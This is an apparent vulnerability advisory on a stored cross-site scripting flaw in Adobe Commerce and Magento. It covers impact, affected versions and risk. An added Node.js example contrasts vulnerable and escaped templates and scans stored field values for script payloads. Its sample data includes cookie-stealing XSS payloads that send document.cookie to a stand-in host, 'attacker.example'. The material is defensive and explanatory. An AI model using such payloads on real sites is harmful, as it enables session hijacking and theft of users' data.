Impact
An attacker who already holds high privileges in Adobe Commerce (an account with elevated rights, such as an administrator, whether malicious or compromised) can store JavaScript in form fields that the application later renders without adequate output encoding. The payload persists server-side and executes in the browser of every user who views the page that renders it, in that user's origin and with that user's session. The attacker can therefore hijack the victim's session and act with the victim's rights, which is why the CVSS assessment rates both confidentiality and integrity impact as high. Note that session hijacking here does not depend on reading the session cookie: script running in the victim's origin can issue authenticated requests on the victim's behalf directly, so an HttpOnly cookie flag does not mitigate the flaw. The weakness is CWE‑79 (improper neutralization of input during web page generation) in its stored, persistent form.
Affected Systems
Adobe Commerce 2.4.9‑alpha3, 2.4.8‑p3, 2.4.7‑p8, 2.4.6‑p13, 2.4.5‑p15 and 2.4.4‑p16 are affected, together with every earlier release on each of those branches. The CPE entries attached to this record cover the affected Commerce and Magento products in both the commercial and the open‑source edition, so Magento Open Source deployments are in scope as well. Because each listed version is the newest patch level on its branch at the time of the advisory, a deployment is affected until it moves to a release that supersedes the one listed for its branch.
Risk and Exploitability
The CVSS base score of 8.1 (High) describes the worst‑case impact, while the EPSS estimate below 1% and the absence of the CVE from the CISA KEV catalog indicate a low probability of exploitation in the near term and no known exploitation in the wild. Two preconditions limit the attack: the attacker must already hold high privileges to write the payload, and a victim must load the page that renders the stored field (user interaction) before the script runs. The realistic threat is therefore an insider or a compromised high‑privileged account using a form field as a persistence point to reach the sessions of other users who view the affected page. Since a successful attack yields session takeover and exposure of confidential data, the low exploitation probability does not justify deferring remediation: update to a release that supersedes the listed version for your branch, and review the affected fields for content stored before the update, because patching changes how fields are handled but does not clean data already in the database.
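The mechanism described under Impact, and the post‑update review suggested under Risk and Exploitability, as an added Node.js example that is not part of this advisory or of Adobe Commerce's code: a vulnerable template pattern next to its escaped form, and a triage scan that flags script‑capable payloads in stored field values. The template, field names, sample rows and the attacker hostname are constructed; the page does not identify which Commerce fields are affected.

```javascript
// Added example: stored XSS through a form field, the output encoding that
// neutralizes it, and a triage scan for payloads already sitting in stored
// data. Illustrative code only, not Adobe Commerce source; field names,
// sample rows and the attacker hostname are constructed.

// Escape a value for HTML text content or a double-quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern (hypothetical template): the stored value is
// interpolated into markup unchanged, so stored markup becomes live markup.
function renderVulnerable(storedValue) {
  return `<input type="text" name="label" value="${storedValue}">\n<p>${storedValue}</p>`;
}

// Hardened pattern: the same two sinks, each escaped for its HTML context.
function renderHardened(storedValue) {
  const v = escapeHtml(storedValue);
  return `<input type="text" name="label" value="${v}">\n<p>${v}</p>`;
}

// Constructs that can execute script. Plain formatting (<b>, <a href="https://...">)
// is deliberately not flagged, because stored HTML is legitimate in some fields.
const EVENT_HANDLERS =
  "load|error|click|dblclick|mouse[a-z]+|focus|blur|key[a-z]+|input|change|submit|" +
  "toggle|animation[a-z]+|pointer[a-z]+|wheel|scroll|begin|end";
const PAYLOAD_PATTERNS = [
  { name: "script-tag",     re: /<\s*script\b/i },
  { name: "event-handler",  re: new RegExp(`<[^>]*\\son(?:${EVENT_HANDLERS})\\s*=`, "i") },
  { name: "javascript-uri", re: /\b(?:href|src|action|formaction|data)\s*=\s*["']?\s*javascript:/i },
  { name: "srcdoc",         re: /<\s*iframe\b[^>]*\bsrcdoc\s*=/i },
  { name: "embed-tag",      re: /<\s*(?:svg|object|embed)\b/i },
];

// Attackers hide "javascript:" or "<" behind character references when the
// value reaches a sink that decodes them (attribute values do). Decode the
// common forms so those variants are not missed by the raw scan.
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\uFFFD");
  return String(s)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, "&");
}

// Return the patterns a stored value matches. "encoded: true" means the value
// only matched after entity decoding and needs manual review of its sink.
function scanValue(value) {
  const hits = [];
  const decoded = decodeEntities(value);
  for (const { name, re } of PAYLOAD_PATTERNS) {
    if (re.test(value)) hits.push({ name, encoded: false });
    else if (re.test(decoded)) hits.push({ name, encoded: true });
  }
  return hits;
}

// Scan an export of stored field values ({ id, field, value } records).
function scanRows(rows) {
  const findings = [];
  for (const row of rows) {
    const hits = scanValue(row.value);
    if (hits.length > 0) findings.push({ id: row.id, field: row.field, hits });
  }
  return findings;
}

function formatReport(findings) {
  return findings
    .map((f) => `${f.field}#${f.id}: ${f.hits.map((h) => h.name + (h.encoded ? " (entity-encoded)" : "")).join(", ")}`)
    .join("\n");
}

// Constructed sample rows standing in for a database export of form-field values.
const SAMPLE_ROWS = [
  { id: 1, field: "product_description",
    value: 'Red <b>wool</b> scarf. See <a href="https://example.com/care">care guide</a>.' },
  { id: 2, field: "product_description",
    value: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">' },
  { id: 3, field: "store_notice", value: "Free shipping on orders over $50" },
  { id: 4, field: "banner_link", value: '<a href="javascript&#58;void(0)">click</a>' },
  { id: 5, field: "display_name",
    value: '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>' },
];

console.log(formatReport(scanRows(SAMPLE_ROWS)));
```

Run the scan against the stored values themselves, not against rendered pages: a correctly escaped page emits `&lt;script&gt;`, which the entity‑decoding pass would report as an encoded hit. Rows flagged `encoded` execute only if the field reaches a sink that decodes character references, such as an attribute value, so check the rendering context before treating them as injection.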
OpenCVE Enrichment